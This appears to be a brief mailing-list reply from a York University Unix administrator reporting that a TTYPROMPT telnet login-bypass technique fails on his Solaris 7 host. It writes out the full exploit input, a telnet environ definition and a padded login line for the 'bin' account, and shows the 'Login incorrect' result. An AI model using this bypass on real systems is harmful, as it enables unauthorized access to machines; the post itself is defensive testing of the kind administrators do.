Sorry but I can't reproduce this on a Solaris 7 machine.

sunlight.ccs% telnet
telnet> environ define TTYPROMPT abcdef
telnet> o localhost
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.

SunOS 5.7

login: bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
c c c
c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\nPassword:
Login incorrect

As you can see I get a request for a username/password.

Ramon Kagan
York University, Computing and Network Services
Unix Team -  Intermediate System Administrator
(416)736-2100 #20263
[EMAIL PROTECTED]

I have not failed.  I have just
found 10,000 ways that don't work.